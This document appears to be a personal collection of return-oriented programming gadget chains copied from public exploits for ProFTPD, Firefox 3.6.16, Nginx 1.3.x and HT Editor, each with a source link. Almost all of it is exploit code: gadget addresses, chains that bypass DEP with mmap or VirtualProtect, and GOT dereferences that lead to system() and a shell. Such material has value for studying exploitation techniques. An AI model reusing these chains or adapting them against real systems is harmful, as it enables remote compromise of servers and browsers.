#ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
#https://www.rapid7.com/db/modules/exploit/linux/ftp/proftp_telnet_iac

#######################################################################################
0xcccccccc, # becomes ebp

0x8080f04,  # pop eax / ret
0x80db330,  # becomes eax (GOT of mmap64)

0x806a716,  # mov eax, [eax] / ret
0x805dd5c,  # jmp eax
0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
# mmap args
0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
0, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
0xcccccccc, # becomes ebp

# note, ebx gets fixed above :)
# 0xfe in 'ah' doesn't matter since we have more than enough space.
# now, load an instruction to store to eax
0x808b542,  # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
# becomes edx - mov [eax+ebp*4]; ebx / ret
"\x89\x1c\xa8\xc3".unpack('V').first,

# store it :)
0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # becomes ebx
0xcccccccc, # becomes esi
0xcccccccc, # becomes ebp

# Copy the following stub:
#"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
#"\x8d\x78\x12"  # lea edi, [eax+0x12]
#"\x6a\x7f"   # push 0x7f
#"\x59"     # pop ecx
#"\xf2\xa5"   # rep movsd

0x80607b5,  # pop ebx / pop ebp / ret
0xfb2124b4, # becomes ebx
1, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x788dffff, # becomes ebx
2, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x597f6a12, # becomes ebx
3, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x9090a5f2, # becomes ebx
4, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x8d909090, # becomes ebx
0, # becomes ebp
0x805dd5c,  # jmp eax

# hopefully we dont get here
0xcccccccc
#######################################################################################

#Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
#https://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_mchannel

# DEP bypass using xul.dll
rop_gadgets = [
  0x1052c871,  # mov esp,[ecx] / mov edx,5c86c6ff / add [eax],eax / xor eax,eax / pop esi / retn 0x8 [xul.dll]
  junk,        # junk --------------------------------------------------------------^^
  0x7c801ad4,  # VirtualProtect
  junk,        # junk -------------------------------------------------------------------------^^
  junk,        # junk -------------------------------------------------------------------------^^
  0x1003876B,  # jmp esp
  0x0c000040,  # start address
  0x00000400,  # size 1024
  0x00000040,  # Page EXECUTE_READ_WRITE
  0x0c0c0c00,  # old protection
].pack("V*")

#######################################################################################

#Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
#https://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_mchannel

# 5 gadgets to pivot using call oriented programming (cop)
# these instructions are taken from: java.dll, zip.dll and MSVCR71.dll (non aslr)
# 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
# 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
# 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN

rop_pivot = [
  0x6D32280C,  # 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
  junk,        # filler
  0x6D7E627D,  # 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
  0x7C3413A4,  # 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN
].pack("V*")

# 319

# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0x65 #(0xca-0x65)

# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")

# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
rop_pivot << [0x6D7E5CDA].pack("V*")

# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0xda # (0x75+0x65)

# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")

# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
rop_pivot << [0x6D325BFC].pack("V*")

# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ <MSVCR71.dll>
rop_gadgets = [
  0x7c346c0a,  # POP EAX / RETN
  0x7c37a140,  # Make EAX readable
  0x7c37591f,  # PUSH ESP / ... / POP ECX / POP EBP / RETN
  junk,        # EBP (filler)
  0x7c346c0a,  # POP EAX / RETN
  0x7c37a140,  # *&VirtualProtect()
  0x7c3530ea,  # MOV EAX,[EAX] / RETN
  0x7c346c0b,  # Slide, so next gadget would write to correct stack location
  0x7c376069,  # MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
  junk,        # EDI (filler)
  junk,        # will be patched at runtime (VP), then picked up into ESI
  junk,        # EBX (filler)
  0x7c376402,  # POP EBP / RETN
  0x7c345c30,  # ptr to 'push esp /  ret'
  0x7c346c0a,  # POP EAX / RETN
  0xfffffdff,  # size 0x00000201 -> ebx
  0x7c351e05,  # NEG EAX / RETN
  0x7c354901,  # POP EBX / RETN
  0xffffffff,  # pop value into ebx
  0x7c345255,  # INC EBX / FPATAN / RETN
  0x7c352174,  # ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
  0x7c34d201,  # POP ECX / RETN
  0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7,  # POP EDI / RETN
  0x7c34b8d8,  # ROP NOP (-> edi)
  0x7c344f87,  # POP EDX / RETN
  0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1,  # NEG EDX / RETN
  0x7c346c0a,  # POP EAX / RETN
  0x90909090,  # NOPS (-> eax)
  0x7c378c81,  # PUSHAD / ADD AL,0EF / RETN
  0x90909090,  # NOPS (-> eax)
].pack("V*")
#######################################################################################

#Nginx HTTP Server 1.3.9-1.4.0
#https://www.exploit-db.com/exploits/25775

def store_ubuntu_1304(address, value)
    chain = [
      0x0804c415, # pop ecx ; add al, 29h ; ret
      address, # address
      0x080b9a38, # pop eax ; ret
      value.unpack('V').first, # value
      0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
    ]
    return chain.pack('V*')
  end

def dereference_got_ubuntu_1304
    chain = [
      0x08094129,         # pop esi; ret
      0x080c5090,         # GOT for localtime_r
      0x0804c415,         # pop ecx ; add al, 29h ; ret
      0x001a4b00,         # Offset to system
      0x080c360a,         # add ecx, [esi] ; adc al, 41h ; ret
      0x08076f63,         # push ecx ; add al, 39h ; ret
      0x41414141,         # Garbage return address
      target['Writable'], # ptr to .data where contents have been stored
    ]
    return chain.pack('V*')
end
#######################################################################################

HT Editor 2.0.20 Buffer Overflow (ROP PoC)
https://www.exploit-db.com/exploits/22683

## Fry: This snow is beautiful. I'm glad global warming never happened.    ##
## Leela: Actually, it did. But thank God nuclear winter canceled it out.  ##
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x81bd518),           # endwin@GOT
pack('V', 0x80b5903),           # mov %esi, %eax; pop pop pop ret;
pack('V', 0xb00b4dad) x 3,      # JUNK
pack('V', 0x813527b),           # mov (%eax), %eax; add $0x1c, %esp; ret;
pack('V', 0xabadf00d) x 7,      # JUNK
pack('V', 0x813589b),           # call *%eax;

##      Amy, technology isn't intrinsecly good or evil, it's how it's used, like the Death Ray. ##
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x81bd3fc),           # __cxa_atexit@GOT - 4 // base address whose pointer will help locating system().
pack('V', 0x80b5903),           # mov %esi, %eax; pop pop pop ret;
pack('V', 0xdeadbeef) x 3,      # JUNK
pack('V', 0x80c21e6),           # add %eax, $0x4; ret; // Beat my 8 bit metal ass.
pack('V', 0x813527b),           # mov (%eax), %eax; add $0x1c, %esp; ret; // In the game of chess, you can never let your adversary see your pieces.
pack('V', 0xdeafface) x 7,      # JUNK
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x292ceaab),          # A number to get the right 
pack('V', 0x80512a6),           # add %esi, %eax; pop pop pop ret;
pack('V', 0xc0b4beef) x 3,      # JUNK
pack('V', 0x80d4612),           # sub eax, 0x292c4e8b ; ret; // I'm not sure. I'm afraid we need to use... MATH.
pack('V', 0x813589b),           # call *%eax;
pack('V', 0x804aa10),           # exit@plt
pack('V', 0x816928f),           # 'sh' string

#######################################################################################


MOV is Turing-complete
https://drwho.virtadpt.net/files/mov.pdf

